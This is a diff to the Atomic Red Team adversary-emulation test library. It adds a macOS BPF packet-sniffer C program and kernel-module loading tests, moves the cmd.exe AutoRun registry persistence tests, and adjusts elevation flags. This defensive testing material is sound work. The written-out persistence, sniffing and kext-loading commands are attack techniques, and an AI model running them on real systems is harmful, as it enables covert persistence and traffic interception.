+  supported_platforms:
+  - macos
+  input_arguments:
+    ifname:
+      description: Specify interface to perform PCAP on.
+      type: String
+      default: en0
+    csource_path:
+      description: Path to C program source
+      type: String
+      default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+    program_path:
+      description: Path to compiled C program
+      type: String
+      default: /tmp/t1040_macos_pcapdemo
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        compile C program
+      prereq_command: |
+        exit 1
+      get_prereq_command: |
+        cc #{csource_path} -o #{program_path}
+  executor:
+    command: |
+      sudo #{program_path} -f -i #{ifname} -t 3
+    cleanup_command: |
+      rm -f #{program_path}
+    name: bash
+    elevation_required: true
@@ -0,0 +1,299 @@
+#include <fcntl.h>
+#include <getopt.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/errno.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <unistd.h>
+
+#include <arpa/inet.h>
+#include <net/bpf.h>
+#include <net/if.h>
+#include <netinet/tcp.h>
+#include <netinet/udp.h>
+#include <netinet/ip.h>
+#include <netinet/if_ether.h>
+#include <netinet/in.h>
+
+#define DEFAULT_IFNAME "en0"
+#define DEFAULT_BUFSIZE 32767
+
+static const struct option longopts[] = {
+    { "filter",  no_argument,  NULL, 'f'},
+    { "promisc",  no_argument,  NULL, 'p'},
+    { "ifname",  required_argument,  NULL, 'i'},
+    { "time",    required_argument,  NULL, 't'},
+    { 0, 0, 0, 0 }
+};
+
+// counters for each protocol seen
+
+static int64_t gNumTcp = 0;
+static int64_t gNumUdp = 0;
+static int64_t gNumIcmp = 0;
+static int64_t gNumOther = 0;
+
+static void usage(const char *progname)
+{
+    printf("usage: %s <options>\n", progname);
+    printf(" -f --filter                     Set BPF filter to UDP. Default is unfiltered.\n");
+    printf(" -p --promisc                    Will enable promisc to capture packets not destined for this system.\n");
+    printf(" -i --ifname <interface name>    Specify ifname. Default is 'en0'.\n");
+    printf(" -t --time <num seconds>         Exit after number of seconds. Default is to run until killed.\n");
+}
+
+typedef struct {
+    char interfaceName[16];
+    unsigned int bufferLength;
+} BpfOption;
+
+typedef struct {
+    int fd;
+    char deviceName[16];
+    unsigned int bufferLength;
+    unsigned int lastReadLength;
+    unsigned int readBytesConsumed;
+    char *buffer;
+} BpfSniffer;
+
+typedef struct {
+    char *data;
+} CapturedInfo;
+
+/*
+ * pick next available /dev/bpf<N> device file.
+ * @returns 0 and sets sniffer->fd on success, returns -1 on failure.
+ */
+int pick_bpf_device(BpfSniffer *sniffer)
+{
+    char dev[16] = {0};
+    for (int i = 0; i < 99; ++i) {
+        sprintf(dev, "/dev/bpf%i", i);
+        sniffer->fd = open(dev, O_RDONLY);
+        if (sniffer->fd != -1) {
+            fprintf(stderr, "opened '%s'\n", dev);
+            strcpy(sniffer->deviceName, dev);
+            return 0;
+        }
+    }
+    return -1;
+}
+
+/*
+ * Based on https://gist.github.com/c-bata/ca188c0184715efc2660422b4b3851c6
+ */
+int new_bpf_sniffer(const char *ifname, BpfSniffer *sniffer, int isBpfFilterEnabled, int isPromiscEnabled)
+{
+    unsigned int bufferLength = DEFAULT_BUFSIZE;
+    if (pick_bpf_device(sniffer) == -1)
+        return -1;
+
+    // setup packet buffer length
+
+    if (ioctl(sniffer->fd, BIOCSBLEN, &bufferLength) == -1) {
+        perror("ioctl BIOCSBLEN");
+        return -1;
+    }
+    sniffer->bufferLength = bufferLength;
+
+    // specify interface
+
+    struct ifreq interface;
+    strcpy(interface.ifr_name, ifname);
+    if(ioctl(sniffer->fd, BIOCSETIF, &interface) > 0) {
+        perror("ioctl BIOCSETIF");
+        return -1;
+    }
+
+    // immediate packet callback?
+
+    unsigned int enable = 1;
+    if (ioctl(sniffer->fd, BIOCIMMEDIATE, &enable) == -1) {
+        perror("ioctl BIOCIMMEDIATE");
+        return -1;
+    }
+
+    // enable Promisc if enabled
+
+    if (isPromiscEnabled) {
+        printf("Attempting to enable PRMOMISC\n");
+        if (ioctl(sniffer->fd, BIOCPROMISC, NULL) == -1) {
+            perror("ioctl BIOCPROMISC");
+            return -1;
+        }
+    }
+
+    // set a BPF traffic filter if set
+
+    if (isBpfFilterEnabled) {
+        // generated using 'tcpdump -i en0 udp -dd'
+        struct bpf_insn instructions[] = {
+{ 0x28, 0, 0, 0x0000000c },
+{ 0x15, 0, 5, 0x000086dd },
+{ 0x30, 0, 0, 0x00000014 },
+{ 0x15, 6, 0, 0x00000011 },
+{ 0x15, 0, 6, 0x0000002c },
+{ 0x30, 0, 0, 0x00000036 },
+{ 0x15, 3, 4, 0x00000011 },
+{ 0x15, 0, 3, 0x00000800 },
+{ 0x30, 0, 0, 0x00000017 },
+{ 0x15, 0, 1, 0x00000011 },
+{ 0x6, 0, 0, 0x00040000 },
+{ 0x6, 0, 0, 0x00000000 },
+            };
+        struct bpf_program filter = {12, instructions};
+
+        printf("Adding BPF filter to only match 'udp' traffic\n");
+
+        if (ioctl(sniffer->fd, BIOCSETF, &filter) == -1) {
+            perror("ioctl BIOCSETF");
+            return -1;
+        }
+    }
+
+    // finally, allocate buffer and initialize
+
+    sniffer->readBytesConsumed = 0;
+    sniffer->lastReadLength = 0;
+    sniffer->buffer = (char *)malloc(sizeof(char) * sniffer->bufferLength);
+    return 0;
+}
+
+int read_bpf_packet_data(BpfSniffer *sniffer, CapturedInfo *info)
+{
+    struct bpf_hdr *bpfPacket;
+    if (sniffer->readBytesConsumed + sizeof(sniffer->buffer) >= sniffer->lastReadLength) {
+        sniffer->readBytesConsumed = 0;
+        memset(sniffer->buffer, 0, sniffer->bufferLength);
+
+        ssize_t lastReadLength = read(sniffer->fd, sniffer->buffer, sniffer->bufferLength);
+        if (lastReadLength == -1) {
+            sniffer->lastReadLength = 0;
+            perror("read bpf packet:");
+            return -1;
+        }
+        sniffer->lastReadLength = (unsigned int) lastReadLength;
+    }
+
+    bpfPacket = (struct bpf_hdr*)((long)sniffer->buffer + (long)sniffer->readBytesConsumed);
+    info->data = sniffer->buffer + (long)sniffer->readBytesConsumed + bpfPacket->bh_hdrlen;
+    sniffer->readBytesConsumed += BPF_WORDALIGN(bpfPacket->bh_hdrlen + bpfPacket->bh_caplen);
+    return bpfPacket->bh_datalen;
+}
+
+int close_bpf_sniffer(BpfSniffer *sniffer)
+{
+    free(sniffer->buffer);
+
+    if (close(sniffer->fd) == -1)
+        return -1;
+    return 0;
+}
+
+void ProcessIncomingPacketLoop(BpfSniffer *psniffer, int timeout)
+{
+    CapturedInfo info = { NULL };
+    int dataLength = 0;
+    time_t tstop = time(NULL) + timeout;
+
+    // loop to process incoming packets
+
+    while((dataLength = read_bpf_packet_data(psniffer, &info)) != -1)
+    {
+        char* pend = (info.data + dataLength);
+        struct ether_header* eh = (struct ether_header*)info.data;
+
+        if (ntohs(eh->ether_type) == ETHERTYPE_IP) {
+
+            struct ip* ip = (struct ip*)((long)eh + sizeof(struct ether_header));
+            switch(ip->ip_p) {
+                case IPPROTO_TCP:
+                    ++gNumTcp;
+                    break;
+                case IPPROTO_UDP:
+                    ++gNumUdp;
+                    break;
+                case IPPROTO_ICMP:
+                    ++gNumIcmp;
+                    break;
+                default:
+                    ++gNumOther;
+                    break;
+            }
+
+        } else {
+            gNumOther++;
+        }
+
+        if (timeout > 0 && time(NULL) >= tstop) {
+            break;
+        }
+    }    
+}
+
+void PrintStats()
+{
+    printf("TCP:%lld UDP:%lld ICMP:%lld Other:%lld\n", gNumTcp, gNumUdp, gNumIcmp, gNumOther);    
+}
+
+void sigint_handler(int sig)
+{
+    PrintStats();
+}
+
+int main(int argc, char *argv[])
+{
+    BpfSniffer sniffer;
+    int isBpfFilterEnabled = 0;
+    int isPromiscEnabled = 0;
+    int timeout = 0;
+    char ifname[16] = DEFAULT_IFNAME;
+    int c;
+
+    memset(&sniffer, 0, sizeof(sniffer));
+
+    while(1)
+    {
+        int option_index = 0;
+
+        c = getopt_long(argc, argv, "fpi:t:", longopts, &option_index);
+        if (c == -1)
+            break;
+
+        switch (c) {
+        case 'f':
+            isBpfFilterEnabled = 1;
+            break;
+        case 'p':
+            isPromiscEnabled = 1;
+            break;
+        case 'i':
+            strcpy(ifname, optarg);
+            printf("using interface '%s'\n", optarg);
+            break;
+        case 't':
+            timeout = atoi(optarg);
+            printf("will exit after about %d seconds (if packet activity)\n", timeout);
+            break;
+        default:
+            printf("invalid argument: '%c'\n", c);
+            usage(argv[0]);
+            return -1;
+        }
+    }
+
+    if (new_bpf_sniffer(ifname, &sniffer, isBpfFilterEnabled, isPromiscEnabled) == -1)
+        return 1;
+
+    signal(SIGINT, sigint_handler);
+
+    ProcessIncomingPacketLoop(&sniffer, timeout);
+
+    PrintStats();
+
+    close_bpf_sniffer(&sniffer);
+    return 0;
+}
@@ -412,7 +412,7 @@ art-marker.txt is in the folder.



-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 


 ```powershell
@@ -178,7 +178,6 @@ atomic_tests:
      Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
      Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
    name: powershell
-    elevation_required: true
 - name: PowerShell Downgrade Attack
  auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
  description: |
@@ -113,7 +113,7 @@ will be displayed. Additionally, open Registry Editor to view the new entry in H



-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `command_prompt`! 


 ```cmd
@@ -135,7 +135,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
 ## Atomic Test #2 - Modify Registry of Local Machine - cmd
 Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
 CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
-will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
+will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

 **Supported Platforms:** Windows

@@ -1165,7 +1165,7 @@ See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/se



-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `command_prompt`! 


 ```cmd
@@ -1441,7 +1441,7 @@ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270



-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `command_prompt`! 


 ```cmd
@@ -1478,7 +1478,7 @@ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/p



-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `command_prompt`! 


 ```cmd
@@ -14,13 +14,12 @@ atomic_tests:
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
    name: command_prompt
-    elevation_required: true
 - name: Modify Registry of Local Machine - cmd
  auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
  description: |
    Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
    CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
-    will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
+    will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
  supported_platforms:
  - windows
  input_arguments:
@@ -495,7 +494,6 @@ atomic_tests:
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
    name: command_prompt
-    elevation_required: true
 - name: Windows Powershell Logging Disabled
  auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
  description: |
@@ -621,7 +619,6 @@ atomic_tests:
      reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
      reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
    name: command_prompt
-    elevation_required: true
 - name: Ursnif Malware Registry Key Creation
  auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
  description: |
@@ -636,7 +633,6 @@ atomic_tests:
      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
    name: command_prompt
-    elevation_required: true
 - name: Terminal Server Client Connection History Cleared
  auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
  description: |
@@ -10,6 +10,10 @@ Since the execution can be proxied by an account with higher permissions, such a

 - [Atomic Test #1 - Persistence with Custom AutodialDLL](#atomic-test-1---persistence-with-custom-autodialdll)

+- [Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-2---hklm---persistence-using-commandprocessor-autorun-key-with-elevation)
+
+- [Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-3---hkcu---persistence-using-commandprocessor-autorun-key-with-elevation)
+

 <br/>

@@ -58,4 +62,84 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato



+<br/>
+<br/>
+
+## Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a574dafe-a903-4cce-9701-14040f4f3532
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command | Command to Execute | string | notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command | Command to Execute | string | notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$path = "HKCU:\Software\Microsoft\Command Processor"
+if (!(Test-Path -path $path)){
+  New-Item -ItemType Key -Path $path
+}
+New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -26,3 +26,44 @@ atomic_tests:
      Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
    name: powershell
    elevation_required: true
+- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+  auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+  description:  |-
+    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+  supported_platforms:
+  - windows
+  input_arguments:
+    command:
+      description: Command to Execute
+      type: string
+      default: notepad.exe
+  executor:
+    command: |- 
+      New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+    cleanup_command: |-
+      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+  auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+  description:  |-
+    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+  supported_platforms:
+  - windows
+  input_arguments:
+    command:
+      description: Command to Execute
+      type: string
+      default: notepad.exe
+  executor:
+    command: |- 
+      $path = "HKCU:\Software\Microsoft\Command Processor"
+      if (!(Test-Path -path $path)){
+        New-Item -ItemType Key -Path $path
+      }
+      New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+    cleanup_command: |-
+      Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
+    name: powershell
@@ -72,10 +72,6 @@ Adversaries can use these configuration locations to execute malware, such as re

 - [Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value ](#atomic-test-15---hklm---modify-default-system-shell---winlogon-shell-key-value-)

- [Atomic Test #16 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-16---hklm---persistence-using-commandprocessor-autorun-key-with-elevation)
-
- [Atomic Test #17 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-17---hkcu---persistence-using-commandprocessor-autorun-key-with-elevation)
-

 <br/>

@@ -484,7 +480,7 @@ to point to a new startup folder where a payload could be stored to launch at bo
 | payload | executable to be placed in new startup location | String | C:&#92;Windows&#92;System32&#92;calc.exe|


-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 


 ```powershell
@@ -674,84 +670,4 @@ Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\W



-<br/>
-<br/>
-
-## Atomic Test #16 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
-An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** a574dafe-a903-4cce-9701-14040f4f3532
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| command | Command to Execute | string | notepad.exe|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
-An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| command | Command to Execute | string | notepad.exe|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$path = "HKCU:\Software\Microsoft\Command Processor"
-if (!(Test-Path -path $path)){
-  New-Item -ItemType Key -Path $path
-}
-New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
-```
-
-
-
-
-
 <br/>
@@ -228,7 +228,6 @@ atomic_tests:
        Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        Remove-Item "#{new_startup_folder}" -Recurse -Force
    name: powershell
-    elevation_required: true

 - name: HKCU - Policy Settings Explorer Run Key
  auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
@@ -332,46 +331,4 @@ atomic_tests:
      Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
    name: powershell
    elevation_required: true
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
-  auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
-  description:  |-
-    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-  supported_platforms:
-  - windows
-  input_arguments:
-    command:
-      description: Command to Execute
-      type: string
-      default: notepad.exe
-  executor:
-    command: |- 
-      New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-    cleanup_command: |-
-      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
-    name: powershell
-    elevation_required: true
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
-  auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
-  description:  |-
-    An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-    [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-  supported_platforms:
-  - windows
-  input_arguments:
-    command:
-      description: Command to Execute
-      type: string
-      default: notepad.exe
-  executor:
-    command: |- 
-      $path = "HKCU:\Software\Microsoft\Command Processor"
-      if (!(Test-Path -path $path)){
-        New-Item -ItemType Key -Path $path
-      }
-      New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-    cleanup_command: |-
-      Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
-    name: powershell
-    elevation_required: true
  
@@ -43,3 +43,64 @@ atomic_tests:
      [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
    name: bash
    elevation_required: true
+- name: MacOS - Load Kernel Module via kextload and kmutil
+  description: |
+    This test uses the kextload and kmutil commands to load and unload a MacOS kernel module.
+  supported_platforms:
+  - macos
+  input_arguments:
+    module_path:
+      description: Folder used to store the module.
+      type: Path
+      default: /Library/Extensions/SoftRAID.kext
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      The kernel module must exist on disk at specified location
+    prereq_command: |
+      if [ -d #{module_path} ] ; then exit 0; else exit 1 ; fi
+    get_prereq_command: |
+      exit 1
+  executor:
+    command: |
+      set -x
+      sudo kextload #{module_path}
+      kextstat 2>/dev/null | grep SoftRAID
+      sudo kextunload #{module_path}
+      sudo kmutil load -p #{module_path}
+      kextstat 2>/dev/null | grep SoftRAID
+      sudo kmutil unload -p #{module_path}
+    name: bash
+    elevation_required: true
+- name: MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
+  description: |
+    This test uses the IOKit API to load a kernel module for macOS.
+    Harcoded to use SoftRAID kext
+  supported_platforms:
+  - macos
+  input_arguments:
+    src_path:
+      description: Folder used to store the module.
+      type: Path
+      default: PathToAtomicsFolder/T1547.006/src/macos_kextload.c
+    exe_path:
+      description: Folder used to store the module.
+      type: Path
+      default: /tmp/T1547006_iokit_loader
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      The kernel module must exist on disk at specified location
+    prereq_command: |
+      if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
+    get_prereq_command: |
+      cc -o #{exe_path} #{src_path} -framework IOKit -framework Foundation
+  executor:
+    command: |
+      sudo #{exe_path}
+      kextstat 2>/dev/null | grep SoftRAID
+      sudo kextunload /Library/Extensions/SoftRAID.kext
+    name: bash
+    elevation_required: true
+    cleanup_command: |
+      rm -f #{exe_path}
@@ -0,0 +1,8 @@
+#include <IOKit/kext/KextManager.h>
+
+int main(int argc, char *argv[])
+{
+	CFStringRef path = CFStringCreateWithCString(kCFAllocatorDefault, "/Library/Extensions/SoftRAID.kext", kCFStringEncodingUTF8);
+	CFURLRef url = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, path, kCFURLPOSIXPathStyle, true);
+	OSReturn result  = KextManagerLoadKextWithURL(url, NULL);
+}
@@ -238,7 +238,7 @@ Upon execution administrative command prompt should open
 | executable_binary | Binary to execute with UAC Bypass | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|


-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 


 ```powershell
@@ -102,7 +102,6 @@ atomic_tests:
    cleanup_command: |
      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
    name: powershell
-    elevation_required: true
 - name: Bypass UAC by Mocking Trusted Directories
  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
  description: |
@@ -1178,3 +1178,7 @@ deff4586-0517-49c2-981d-bbea24d48d71
 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
 04d55cef-f283-40ba-ae2a-316bc3b5e78c
 716e756a-607b-41f3-8204-b214baf37c1d
+6c7a4fd3-5b0b-4b30-a93e-39411b25d889
+42510244-5019-48fa-a0e5-66c3b76e6049
+e6fe5095-545d-4c8b-a0ae-e863914be3aa
+e2480aee-23f3-4f34-80ce-de221e27cd19